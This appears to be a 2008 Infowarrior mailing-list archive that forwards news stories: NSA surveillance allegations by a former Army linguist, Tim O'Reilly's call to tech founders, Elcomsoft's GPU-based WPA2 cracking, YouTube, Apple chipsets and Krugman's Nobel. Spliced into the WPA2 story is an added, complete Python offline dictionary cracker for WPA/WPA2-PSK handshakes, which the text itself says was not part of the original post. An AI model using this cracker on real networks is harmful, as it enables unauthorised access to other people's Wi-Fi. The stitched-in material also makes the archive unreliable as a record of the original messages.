Kinne first raised her allegations in July 2007 to a blogger named David Swanson whom she'd encountered after an anti-war protest. Threat Level contacted her a couple of days later and spoke with her a number of times over several months. Kinne, who is 31, served in the U.S. Army Reserves as a sergeant and an Arabic linguist from October 2001 to August 2003 at a U.S. Army Signal Center at Fort Gordon, Georgia, which operated as a listening post for the National Security Agency. Kinne had served active duty in the U.S. Army as an intelligence linguist with a top secret SCI security clearance from 1994 to 1998, and was in the reserves on September 11, 2001. In desperate need of Arabic translators with classified clearances, the Army called Kinne's reserve battalion for active duty. Kinne served with the 201st Military Intelligence battalion, which is part of the 513th Military Intelligence brigade. Kinne said that during the time she was at Fort Gordon, the government was intercepting and listening to phone calls made by American citizens and allies working for aid organizations and media outlets. At first, Kinne didn't think they were doing anything wrong because in mid-2002, several months after the surveillance began, a supervisor told her group of linguists and analysts that they had received a "waiver" that allowed them to intercept and listen to the conversations of Americans. The waiver also gave them permission to spy on British, Canadian and Australian citizens, Kinne said. Under federal law, such a waiver would usually require special national security circumstances -- such as an imminent threat of death or attack. But Kinne said the people whose conversations she targeted didn't discuss information of a military or terrorist nature, and the interceptions occurred over the entire Middle East -- not just in war zones. The surveillance was still going on when Kinne left active reserve duty in August 2003.
Kinne's mission at Fort Gordon, which was given the name Highlander, intercepted only communication sent through satellite phones, which included faxes. This represented a change from her active duty in the 1990s when her group had intercepted only live radio transmissions involving military targets in the Middle East. The operation that began in 2001 involved region-wide interceptions, which meant that satellite calls of businessmen, journalists and other civilians were sometimes vacuumed up with everything else. Generally, when incidental interception of Americans occurs, there are procedures for handling the intercepts. Under USSID 18, recordings of such calls are supposed to be abandoned and destroyed when a U.S. citizen is identified. The only exceptions to this rule are when the attorney general affirms that the surveillance target is believed to be an agent of a foreign power, or the purpose of the collection is to acquire "significant foreign intelligence information." Kinne's description of the interceptions, however, indicated that U.S. aid workers and journalists were routinely targeted without cause. To illustrate that contrast, Kinne recalled a conversation intercepted by her army intelligence unit in 1997, in which one of the parties to the call mentioned the name of a U.S. politician who was coming to the Middle East for a visit. Under USSID 18, the names of members of the U.S. legislative branch cannot appear in intelligence reports without special authorization, and Kinne said her group deleted every record they collected that mentioned the politician's name. William Weaver, who worked in U.S. Army signals intelligence for eight years in Berlin and Augsburg, Germany, concurred with her assessment of how seriously USSID 18 was regarded. "The way USSID 18 was treated by us was that it came down from God and was sacrosanct," said Weaver, who is now an assistant professor of political science at the University of Texas, El Paso.
"We were told at training and many times after that, that if you violated USSID 18 you could spend the rest of your life in prison. The mindset was that you do not intercept U.S. citizens. And the minute you recognized that you intercepted, you immediately reported up the chain of command." Kinne said everything changed shortly after her unit intercepted a call in early to mid-2002 between British and U.S. aid workers. The two were discussing day-to-day work details when the British worker told the American, "You should be careful about what you're saying because the Americans are listening to us." The American responded that USSID 18 barred U.S. authorities from spying on the communication of Americans, so the British worker had nothing to worry about. Kinne said her supervisor, Chief Warrant Officer John Berry, and others were livid. "[They] acted as if he was betraying some hugely intense national secret to a foreigner," she said. "So that's when they were like, 'We need to be able to listen to them'." Shortly thereafter, she said, Berry informed her that they had received a waiver from USSID 18. She said it was communicated verbally during one of her shifts. "They never showed us anything in writing," said Kinne. "But we never expected to get anything in writing." Berry, who now works as a reporter for the Press-Enterprise in Riverside, California, hung up the phone on Threat Level at the first mention of Kinne's name. Kinne said that in the nearly two years she was monitoring conversations, her group processed between 300 and 500 calls a day in numerous languages, including Farsi, Dari, Tagalog, Japanese, Chinese and Russian. Between 10 and 20 percent of the calls she monitored involved English-speakers, which included Americans, Canadians and British citizens. Nearly 99 percent of the calls she monitored were non-military-related. Relatively few of the calls that came in were in Arabic.
The calls were intercepted and digitally recorded by members of the Army's military intelligence unit in Kuwait, then sent to Fort Gordon. The system would pick up conversations for whatever phone numbers the military programmed into its interception system, though Kinne assumed the system also randomly swept satellite calls for untargeted numbers, since so many calls were recorded for numbers whose owners were unknown. For the first couple of months Kinne and her colleagues didn't know the identity of the people connected to the phone numbers they monitored. "At that point in time, we were just given numbers and we ... were still sorting out who belonged to what," she said. "That's why we initially started collecting Americans and other nationals because we didn't know whose number belonged to whom." Once they identified speakers, they typed the person's name or organization into the system, so that when a conversation involving that number was intercepted again, the name appeared on their computer screen. Although the system allowed them to block phone numbers identified as belonging to a nongovernmental organization or journalist, they never did so. Instead, she said, they added the numbers of humanitarian aid organizations and journalists to a priority list. "They were 'priority five,' from what I remember," she said. "'Priority one' was terrorist organizations. 'Priority five' is middle of the road. 'Priority nine' was just unidentified numbers. Not only were we given the ability to listen to [NGOs and journalists], but it was programmed into our system to listen to them." Periodically, they received a list of new numbers that had been programmed into the system. "I don't know where the numbers were coming from," Kinne said. "We were just given raw materials and we had to identify what number belonged to what organization and prioritize and set up a list." They wrote a report on each call, except those made to parties in the U.S.
Kinne said they were just instructed to listen to those calls. She later said in another conversation that some people in her group did write reports involving conversations of Americans and Australians, but didn't reference the nationality of the speaker in their report. "Americans 'in-country' were fair game as long as you didn't identify them as American," she said. "People wrote reports on what journalists said all the time." Kinne's recollections of intercepted calls were vague on details, as one might expect of someone recalling four-year-old conversations that held no significance at the time. She was generally unable, for example, to recall the names of people whose calls were intercepted or the names of specific media outlets to which the monitored journalists belonged. The few she did remember stood out in her mind because of the nature of the calls or circumstances surrounding them. For example, Kinne was reprimanded for listening to one call when she should have been focused on a fax that her unit intercepted purporting to identify the location of weapons of mass destruction in Iraq. The fax arrived in the middle of the night, around the time of the Iraq invasion, while Kinne was monitoring a call involving two English-speaking humanitarian aid workers who were in a vehicle frantically trying to reach their office to find cover before bombs began raining on the city. "I just remember they were ... calling in their position [to their colleagues] every 10 to 15 minutes or so because they were worried about their safety," she said. Kinne filed several reports about the aid workers and gave their location to her supervisor, believing that U.S. military personnel might help the aid workers, or at least refrain from shooting their vehicle. But while she was monitoring the workers, a fax arrived, several pages long and written in Arabic.
Even though the fax was from a phone number with a higher priority, Kinne ignored it because she felt the lives of the aid workers were more important. When another worker later read the fax and realized its significance, all of the workers were instructed to drop everything to translate it. Kinne said the fax purported to describe the location of chemical, biological and other weapons of mass destruction in Iraq. As soon as her group completed the translation, she said it was sent to the White House -- the only time information was sent directly in this manner. After the information was on its way, Kinne looked at the source of the document and began to doubt its authenticity. She said it came from the Iraqi National Congress or Iraqi National Accord -- she couldn't remember which. Kinne said she expressed doubts to her commanding officer, John Berry, about the authenticity of the information and was told that her job was to collect the information, not analyze it. "He said I didn't care about our mission or our country ... and I needed to stop asking questions," she said. Kinne was written up in an incident report for having ignored the fax when it came in. When she later read news reports confirming that an Iraqi group had fed the military intelligence false information, she suspected the fax had been deliberately sent through an open satellite network so that her unit would intercept it and give it to the White House. The only other conversations Kinne recalled with any detail involved journalists staying at a hotel in Baghdad around the time of the U.S. invasion. The journalists revealed their location in calls to U.S. family members. Kinne said she'd been monitoring the conversations of journalists at the hotel for a while, when the name of the hotel appeared on a military list of targets for bombing. Kinne said she brought the information to Berry's attention.
"I told him, you realize there are journalists staying in that hotel and we have just said that we are going to bomb it," she said. "I assumed that ... whoever made the targeting list didn't know journalists were staying there." She didn't know if the information was passed on to anyone, but in April 2003, a U.S. tank fired on the Palestine Hotel, which was serving as a base for many journalists. Two journalists were killed. Two subsequent investigations by the army and the Committee to Protect Journalists concluded that the gunners had never been told journalists were at the hotel. Two fellow linguists who had worked with Kinne at Fort Gordon disputed Kinne's story of illegal surveillance. They asked to remain anonymous because they were violating orders to not discuss their work at Fort Gordon. Both linguists said they never violated USSID 18 and had never heard about a waiver, which one of them called implausible. They said USSID 18 was drummed into their heads and was posted everywhere at work as a constant reminder. "There is just no breaking that rule," one linguist said. "There are a lot of other rules they can change and have changed, but they don't change that one. We don't want to have a Watergate experience." The same linguist said if there had been any guidance from supervisors about violating USSID 18, it would have been along the lines of "if you hear something that meets this high criteria ... and there are words that are scaring you, tip it off to the head chief and they will decide if there is imminent risk. That is the only way we deviate ... So if [Kinne's] understanding is that all the rules got tossed, there is no way [that happened]." The other linguist was just as emphatic. "[N]ever in my entire military career have I ever been told that it was okay to listen to U.S. citizens. [If] an intercept came in that had a citizen's conversation, I was never told I could report what came from Americans."
They were both angry with Kinne for discussing their work. One said if Kinne thought their mission had been illegal, she should have gone through internal processes or reported it to the FBI. "If there was something going on, she had methods to handle it. To go outside and do it in this way indicates a need to make it fantastical. Or to get back at somebody." The other translator noted that Kinne had conflicts with a number of people she worked with -- particularly her supervisor Berry -- and had a negative view of their team and its mission, which may have affected her perception of the operation. They described Berry as a problematic and hostile manager who didn't seem to know what he was doing. Adding to this was a pervasive sense of confusion around their mission, which was set up quickly on the fly and being run by reservists who had no experience intercepting phone calls. The unit was overworked, understaffed and undertrained. They didn't have a standard of operation, or SOP, when they started the mission and had to cobble one together from other SOPs. Many conversations they had to translate were in dialects unfamiliar to them or languages, such as Pashtu, in which they had no proficiency. In that confusion, there might have been times when people inadvertently listened to conversations they shouldn't have, but both linguists said the policy was clear that they were not to listen or report on U.S. citizens or allies. "There was a lot of crazy stupidity going on, but [Berry] wasn't abusing USSID 18 because he didn't have the authority," one said. The other linguist said, "[T]he entire way of using intelligence and the dissemination of information ... were changing, and as things were changing and we were trying to figure things out, I think there could have been a lot of gray lines that were walked instead of black and white." Asked for an example of these gray lines, the linguist explained: "[S]ometimes when you are searching for information ... 
things come across your way that are extraneous or not pertinent to what you should be doing, and if you come across that and you don't act on it, you don't report it, it's like it never happened. I can say there are times when that's possibly a gray area ... You hear a lot of things, you see a lot of things, but a lot of it is junk ... [and] some of it might be accidental. But the number one mandate [that] you are conscious of is, 'Is this something I should be listening to? Is this something I can report on?' If it doesn't meet those two criteria, you're going to discard it." It's worth noting that Kinne began speaking about her surveillance activities only after becoming an anti-war activist, and working with groups calling for the impeachment of President Bush. When Threat Level spoke with her last year, she was working as a research assistant for the Veterans Administration in Vermont and was becoming increasingly active politically. She had worked on get-out-the-vote campaigns for Moveon.org in November 2006, and in January 2007 began meeting with members of Iraq Veterans Against the War. She participated in a rally and a sit-in at the Vermont state house and went on a bus tour with anti-war activist Cindy Sheehan calling for the impeachment of President Bush. Kinne said that after the White House announced a troop escalation in Iraq, she became very angry that the 2006 mid-term elections and subsequent changes in Congress hadn't led to pressure on the Administration to pull out of Iraq. But it wasn't until details of the government's illegal domestic spying operation on Americans were revealed in late 2005, that she had reason to ponder her surveillance work, she said. Even then, her realization came slowly. "I never really thought about how what we did related to [those news reports]," she said. "It took me quite a while to put the pieces together.
I just figured we were one mission, and I never thought that probably military intelligence groups across the country were all being given waivers to listen to whomever they wanted." It was another year and a half after the New York Times broke the story on the domestic surveillance program before Kinne uttered her first public words about the surveillance she had conducted on behalf of the NSA. "I still felt like it was all classified and I wasn't supposed to talk about it," she said. "But the more I got involved in things, the more I started getting really angry that people in government were not telling the truth and that people who know what's going on [are] not speaking out. The more I thought about it, the more I realized that I should tell people what I knew and hopefully that would encourage other people to say what they know." She said she just wanted to pass the information to others who could determine whether the army and administration broke the law. To that end, she had submitted her allegations to Sen. Patrick Leahy's office (D-Vermont) in the hope that his staff would look into the matter to determine if laws had been broken. Leahy's staff sent her an e-mail indicating that they sent her letter to the Department of Defense Inspector General. But Kinne never heard anything after that. Given her political activities and the delay in reporting the alleged abuse, the denials of her peers and the lack of corroborating evidence, Threat Level elected not to publish her claims last year. But in his upcoming book, The Shadow Factory, journalist James Bamford -- the leading civilian expert on the NSA -- reports that he confirmed the illegal surveillance with another linguist named David Murfee Faulk, who worked on the program through the Navy. One of Faulk's coworkers -- not Kinne -- asked a supervisor about USSID 18, and was ordered to disregard the directive, Bamford reports. 
James Dempsey, policy director of the Center for Democracy and Technology, said last year that if Kinne's information was accurate, it would be a significant advancement to what we knew about the administration's warrantless surveillance. "Up to now the administration has said that every single phone call that we intercepted we did so because we knew there was al-Qaida on the phone," Dempsey said. "Now you're saying that, at least overseas, they were targeting Americans when they had no reason to believe an al-Qaida member was on the other line. This is the first indication that the government was targeting not terrorists but Americans overseas on less than probable cause." From rforno at infowarrior.org Sat Oct 11 14:52:59 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 11 Oct 2008 10:52:59 -0400 Subject: [Infowarrior] - O'Reilly to new geeks: "get serious!" Message-ID: <98E76F67-3864-4746-9D2A-CFC5EF4BA3DC@infowarrior.org> http://www.latimes.com/business/printedition/la-fi-oreilly10-2008oct10,0,85246.story From the Los Angeles Times SILICON VALLEY Tech guru Tim O'Reilly challenges next generation to get serious The entrepreneur, investor and book publisher urges young entrepreneurs and engineers to stop making silly software and start making a real difference in the world. By Jessica Guynn Los Angeles Times Staff Writer October 10, 2008 SAN FRANCISCO -- Silicon Valley insiders call it the O'Reilly Radar: Tim O'Reilly's uncanny ability to spot a technology revolution before it happens. But lately the entrepreneur, investor and book publisher has been busier trying to incite the next one. He is urging young entrepreneurs and engineers to stop making some of the sillier software that lets Facebook users throw virtual sheep at their friends or download virtual beer on iPhones, and instead start making a real difference in the world. 
He says it's not just the right thing to do, but also the smart thing to do -- especially as the credit crunch spreads to Silicon Valley, venture financing becomes scarce and start-ups have to retrench. When this grizzled, 54-year-old tech-industry veteran talks, Silicon Valley tends to listen, if only to argue with him. After all, this is the guy who understood the power and significance of the Internet before most people were aware it existed. In 1992, he published "The Whole Internet User's Guide & Catalog," the first popular book about the medium, which was later selected by the New York Public Library as one of the most significant books of the 20th century. He now runs O'Reilly Media, an influential book publishing empire in Sebastopol, Calif., which has snagged a significant share of the computer book market with series such as "The Missing Manual" and "Hacks." Early this decade, O'Reilly helped coin the term "Web 2.0" to refer to the current phase of the Internet, which relies on collective intelligence and action from the bottom up (think social networks such as Facebook and photo-sharing sites such as Flickr). He is perhaps best known for putting on packed conferences headlined by some of the tech industry's brightest. Now he is using those conferences as a bully pulpit. The theme of his Web 2.0 conference here next month is "Web meets world." It will showcase activists such as former Vice President Al Gore, cyclist-philanthropist Lance Armstrong and Larry Brilliant, who, as head of Google.org, has reinvented philanthropy by setting up a foundation without tax-exempt status to invest in for-profit and nonprofit efforts. O'Reilly argues that Silicon Valley has strayed from the passion and idealism that fuel innovation to instead follow what he calls the "mad pursuit of the buck with stupider and stupider ideas." 
Flush with money and opportunity following the post-dot-com resurgence, he says, some entrepreneurs have cocooned in a "reality bubble," insulated from poverty, disease, global warming and other problems that are gripping the planet. He argues that they should follow the model of some of the world's most successful technology companies, including Google Inc. and Microsoft Corp., which sprang from their founders' efforts to "work on stuff that matters." Not everyone is convinced that business is the right vehicle to tackle social or environmental ills. But Jim Schorr, who lectures on social entrepreneurship at UC Berkeley's Haas School of Business, says he can't imagine "a higher calling for the next generation of tech entrepreneurs." "The opportunity to focus technology and tech entrepreneurs on the unaddressed, underserved segments of society is enormous," Schorr said. "Developing and extending technologies with limited profit potential, using market-driven approaches, can deliver both social and financial impact and sustainability." Though the Web 2.0 generation has a reputation for indulgence and narcissism, O'Reilly can point to a number of ventures using Silicon Valley ingenuity to deliver on Schorr's ideal. The Omidyar Network, created by EBay Inc. founder Pierre Omidyar and his wife, Pam, makes grants to and investments in worthy causes. Benetech.org, started by former rocket scientist Jim Fruchterman, creates software for human rights activists, environmentalists and people with disabilities. The Wildlife Conservation Network -- started by software engineer Charles Knowles, conservationist John Lukas and Akiko Yamazaki, wife of Yahoo Chief Executive Jerry Yang -- uses technology and a venture capital model to help save endangered species. A growing number of businesses are turning to social networking tools to encourage people to get more politically active and drum up donations for charities. 
Causes, started by Sean Parker and Joe Green, created the popular Causes application on Facebook and MySpace. Its 14.5 million users have created 110,000 campaigns. O'Reilly also singles out two other Web 2.0 stars for providing social benefit. Twitter, an instant digital communications service, has helped coordinate disaster response. YouTube, the video sharing website now owned by Google, has helped activists fight repressive regimes in other countries. "Simply providing technology that can be used for positive causes can have an enormous impact," he said. So how has O'Reilly's message gone over with the Web 2.0 crowd? "I've had a whole bunch of people tell me they were super-inspired," O'Reilly said. "I've had a few people act like I am raining on their parade." Michael Arrington, founder of the influential technology blog TechCrunch, says he appreciates the effort to get entrepreneurs and engineers to consider doing more, such as volunteering in schools to teach kids how to program computers. But he says O'Reilly's lament trivializes the good work done by Silicon Valley. "It's good to be aware that there are big problems out there that could be very profitable for companies to solve," Arrington said. "That doesn't mean that entrepreneurs who don't decide to tackle those problems aren't valuable to society." O'Reilly says he respects those contributions -- and makes a nice living showcasing them in his books and conferences. But, he says, "we have a tech generation that thinks that's all there is." "The real Web 2.0, the web of collective intelligence applications, is going to be stronger as a result of any downturn," he said. "Heck, figuring out more transparent financial markets alone will be a hotbed of opportunity." 
jessica.guynn at latimes.com From rforno at infowarrior.org Sun Oct 12 21:13:07 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 12 Oct 2008 17:13:07 -0400 Subject: [Infowarrior] - Elcomsoft gets 100x increase in WPA2 cracking speed Message-ID: <8A23E5CB-A67E-4AE0-9E52-70247CA2F471@infowarrior.org> Russian researchers achieve 100-fold increase in WPA2 cracking speed Oct.12, 2008 in Security http://securityandthe.net/2008/10/12/russian-researchers-achieve-100-fold-increase-in-wpa2-cracking-speed/ Russian security company Elcomsoft just posted a press release (original PDF) detailing a new method to crack WPA and WPA2 keys: With the latest version of Elcomsoft Distributed Password Recovery, it is now possible to crack WPA and WPA2 protection on Wi-Fi networks up to 100 times quicker with the use of massively parallel computational power of the newest NVIDIA chips. Elcomsoft Distributed Password Recovery only needs a few packets intercepted in order to perform the attack. The 100-fold increase in speed is achieved with two GeForce GTX 280s per workstation; for $599 you can build a network of 20 workstations dedicated to "recovering" your "lost" WPA keys. This means that a WPA or WPA2 key could be cracked in days or weeks instead of years. This has prompted security firm GSS to advise their clients to add an additional layer of protection to their Wi-Fi networks: "This breakthrough in brute force decryption of Wi-Fi signals by Elcomsoft confirms our observations that firms can no longer rely on standards-based security to protect their data," said GSS managing director David Hobson. "As a result, we now advise clients using Wi-Fi in their offices to move on up to a VPN encryption system as well." But the question remains how long it will take until the next generation of GPUs or custom-designed chips will break VPN encryption as well. 
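What the forwarded article calls "recovering" a WPA key is an offline guess-and-verify loop against the captured four-way handshake, and the following Python is an added worked example of that loop (it is not Elcomsoft's code and not part of the original post). It implements the 802.11i derivation chain the attacker has to redo per guess: PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt (4096 rounds) to get the PMK, the PRF to expand PMK plus the two MAC addresses and two nonces into the PTK, and the HMAC-SHA1 MIC over handshake message 2 that the guess is checked against. The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are constructed for the example; the MIC is computed from them with a chosen passphrase so there is something genuine to verify. The only external fact relied on is the PBKDF2 test vector from the 802.11i standard (passphrase "password", SSID "IEEE"), used in the test to check the PMK function.

```python
import hashlib
import hmac

# IEEE 802.11i parameters for WPA/WPA2-PSK.
PBKDF2_ROUNDS = 4096          # fixed work factor per candidate passphrase
PMK_LEN = 32                  # 256-bit Pairwise Master Key
PTK_LEN_CCMP = 48             # KCK(16) | KEK(16) | TK(16) for WPA2/AES-CCMP
PTK_LABEL = b"Pairwise key expansion"


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).

    The SSID is the salt, so a precomputed table only helps against one
    network name; the 4096 rounds are the per-guess cost a GPU parallelises."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
            anonce: bytes, snonce: bytes, nbytes: int = PTK_LEN_CCMP) -> bytes:
    """PTK from the PMK and the four values an eavesdropper sees in the air."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, PTK_LABEL, data, nbytes)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/AES): HMAC-SHA1 over the
    EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Offline dictionary attack: re-derive PMK -> PTK -> KCK for each guess and
    compare the resulting MIC with the one captured in handshake message 2.
    Returns the matching passphrase, or None if no candidate fits."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def sample_handshake(passphrase: str = "summer2008") -> dict:
    """Constructed handshake, not a real capture: made-up SSID, MACs, nonces and
    EAPOL body. The MIC is computed from them with the given passphrase the
    same way a real client would, so crack_psk has a genuine value to verify."""
    ssid = "CorpWiFi"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed-anonce").digest()
    snonce = hashlib.sha256(b"constructed-snonce").digest()
    # Message 2 layout: EAPOL header, descriptor type, key info, key length,
    # replay counter, SNonce, IV/RSC/ID (zero), MIC field zeroed, key data length.
    eapol_frame = (bytes.fromhex("0203005f") + bytes.fromhex("02010a0010")
                   + b"\x00" * 8 + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_frame": eapol_frame,
            "captured_mic": eapol_mic(kck, eapol_frame)}


if __name__ == "__main__":
    hs = sample_handshake()
    guesses = ["password", "letmein", "CorpWiFi", "Summer2008", "summer2008"]
    print("recovered:", crack_psk(wordlist=guesses, **hs))
```

Two things the loop makes concrete. The "few packets" the article mentions are messages 1 and 2 of the handshake (ANonce, SNonce and the MIC); nothing else about the network is needed, and the attacker never has to send a frame. And the cost per guess is fixed by the standard, not by the defender: 4096 PBKDF2 rounds each, whatever hardware runs them, which is exactly the work a GPU spreads across its cores. The defences that remain are a long, high-entropy passphrase that no wordlist or mask will reach, or 802.1X/EAP authentication, where there is no shared passphrase to guess at all.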
DES encryption can already be broken quite easily with custom-built machines, and while AES appears to be better on paper, there is no guarantee that there isn't some hidden flaw in the algorithm. GSS agrees: Hobson added that the development could spur a step back from wireless to wired network connection in sensitive installation, such as financial services organisations, particularly concerned about data privacy. Update: This will, of course, mainly affect simple ASCII keys. And it will only work against static keys; anyone using more complicated authentication schemes will not be at risk for now. But since that takes a couple of extra minutes when installing, smaller businesses or departments often skip setting this up. From rforno at infowarrior.org Mon Oct 13 11:31:37 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 07:31:37 -0400 Subject: [Infowarrior] - Comic Wisdom from XKCD Message-ID: <26577CD5-FD01-47F4-BE70-86509BA779B7@infowarrior.org> Today's XKCD is a keeper and speaks wisdom beyond its simple stick-figure presentation. http://xkcd.com/488/ From rforno at infowarrior.org Mon Oct 13 13:28:59 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 09:28:59 -0400 Subject: [Infowarrior] - YouTube adds full-length television shows Message-ID: <1A46B78E-C729-4EF9-852B-A213B29DA77A@infowarrior.org> YouTube adds full-length television shows By Michael W. Jones http://tech.blorge.com/Structure:%20/2008/10/12/youtube-adds-full-length-television-shows/ At a time when much of the television news revolves around the analog to digital change and reality television hijinks, YouTube has made some news of its own. The Google-owned video Web site has moved to put full-length television shows on its site for the first time. Historically, YouTube has hosted a bewildering and attractive variety of video clips, the vast majority of which have been less than ten minutes in length. 
YouTube announced on Friday that it had finalized a deal with CBS to offer shows such as Star Trek, MacGyver, Beverly Hills 90210, and The Young and the Restless. In some ways this new offering is more of a change in length and legality than an abrupt left turn. There have been small segments of television shows on YouTube almost since the beginning, but these also adhered more or less to the ten-minute time limit and were not sanctioned by the owners of the content. Often, such segments were removed after the copyright owner complained about their inclusion on the site. That will no longer be the case, at least for the content covered by the deal with CBS. YouTube also said that it was in negotiation with other providers of lengthier content, specifically mentioning other television networks. This announcement follows on the heels of the introduction of their TheaterView product, which is aimed at the provision of a higher quality online viewing experience. It is not too far a stretch of the imagination to assume that these two new services are somehow related. The new services also put YouTube head to head with Hulu, competing directly for the full-length television show viewer. Hulu currently has more of this sort of content than YouTube, but YouTube has the lion's share of the Web video audience. It is estimated that YouTube has 100 times the viewers that Hulu has. With viewership being the key number in this marketplace, and with a business plan that now includes full-length television content, YouTube (and Google) are positioned to make a serious run at their competition. From rforno at infowarrior.org Mon Oct 13 13:33:16 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 09:33:16 -0400 Subject: [Infowarrior] - Apple to 'ditch' Intel for Nvidia in standard MacBooks Message-ID: Apple to 'ditch' Intel for Nvidia in standard MacBooks http://www.theregister.co.uk/2008/10/13/apple_drop_intel_for_nvidia_rumour/ By Kelly Fiveash 
Posted in PCs & Chips, 13th October 2008 12:37 GMT Apple will drop Intel's integrated graphics chipsets in its new family of MacBooks in favour of Nvidia's new mobile platform, according to speculative reports. The company is expected to announce that decision tomorrow, AppleInsider reports. If the rumours are correct, the standard 13-inch machines will be loaded with chipsets from Nvidia's MCP79 platform. Apple began shipping Intel-based x86 processors in its notebooks in 2006. The MCP79 platform, which is seen as a substitute for Intel's Centrino 2 "Montevina" system, supports the 1066MHz front side bus and has PCI Express 2.0 interfaces and optional DDR3 memory. Centrino 2 was finally released into the wild in July this year after a series of problems forced Chipzilla to delay the release of its refreshed platform. Apple boss Steve Jobs first told software developers in June 2005 of the company's decision to migrate from PowerPC to x86 processors, courtesy of Intel. Meanwhile, Apple on Friday said it will repair MacBook Pros where the Nvidia GPU has failed, or fails within two years from the purchase date. It also put the boot in to Nvidia after it confessed earlier this year to a higher than normal failure rate for some of the company's graphics processors due to a packaging defect. The chip maker claimed at the time that Apple's Mac computers were unaffected by the glitch. Apple has disagreed with that assessment. "After an Apple-led investigation, Apple has determined that some MacBook Pro computers with the NVIDIA GeForce 8600M GT graphics processor may be affected," said the firm in a statement on its website. "If the NVIDIA graphics processor in your MacBook Pro has failed, or fails within two years of the original date of purchase, a repair will be done free of charge, even if your MacBook Pro is out of warranty." Odd then, you might agree, that Apple could be considering Nvidia over Intel for its new line of MacBooks. 
We should know more tomorrow. From rforno at infowarrior.org Mon Oct 13 14:09:57 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 10:09:57 -0400 Subject: [Infowarrior] - Congratulations to Paul Krugman Message-ID: October 13, 2008, 7:50 am Paul Krugman Wins Economics Nobel By Catherine Rampell http://economix.blogs.nytimes.com/2008/10/13/paul-krugman-wins-economics-nobel/?hp Paul Krugman, a professor at Princeton University and an Op-Ed columnist for The New York Times, was awarded the Nobel Memorial Prize in Economic Sciences on Monday. "It's been an extremely weird day, but weird in a positive way," Mr. Krugman said in an interview on his way to a Washington meeting for the Group of Thirty, an international body from the public and private sectors that discusses international economics. He said he was mostly "preoccupied with the hassles" of trying to make all his scheduled meetings today and answer a constantly-ringing cell phone. Mr. Krugman received the award for his work on international trade and economic geography. In particular, the prize committee lauded his work for "having shown the effects of economies of scale on trade patterns and on the location of economic activity." He has developed models that explain observed patterns of trade between countries, as well as what goods are produced where and why. Traditional trade theory assumes that countries are different and will exchange different kinds of goods with each other; Mr. Krugman's theories have explained why worldwide trade is dominated by a few countries that are similar to each other, and why some countries might import the same kinds of goods that they export. "There was something very beautiful about the old existing trade theory, and its ability to capture the world in a surprisingly simple conceptual framework," Mr. Krugman said. "And then I realized that some of the new insights coming through in industrial organization could be applied to international trade." 
Mr. Krugman wrote his dissertation, however, on international finance, and credits his late MIT professor Rudiger Dornbusch for pushing him to study international trade. "I went to visit him one snowy day in early 1978 and described to him what I'd been thinking about," Mr. Krugman said. "He turned to me and said, 'You've got to write about that.'" Mr. Krugman has been an Op-Ed columnist at the New York Times since 1999. A collection of his recent columns can be found here. "For economists, this is a validation but not news. We know what each other have been up to," Mr. Krugman said. "For readers of the column, maybe they will read a little more carefully when I'm being economistic, or maybe have a little more tolerance when I'm being boring." He said that he does not expect his critics to let him off any easier because of his new accolade, though. "I think we've learned this when we see Joe Stiglitz writing," Mr. Krugman said, referring to the winner of the economics Nobel in 2001. "I haven't noticed him getting an easy time. People just say, 'Sure, he's a great Nobel laureate and he's very smart, but he still doesn't know what he's talking about in this situation.' I'm sure I'll get the same thing." In 1991 Mr. Krugman received the John Bates Clark medal, a prize given every two years to "that economist under forty who is adjudged to have made a significant contribution to economic knowledge." Mr. Krugman follows a number of Clark medal recipients who have gone on to win a Nobel, including Mr. Stiglitz. "To be absolutely, totally honest I thought this day might come someday, but I was absolutely convinced it wasn't going to be this day," Mr. Krugman said. "I know people who live their lives waiting for this call, and it's not good for the soul. So I put it out of my mind and stopped thinking about it." He said he didn't actually know which day the winner's name would be released until a colleague told him last week. Mr. Krugman continues to teach at Princeton. 
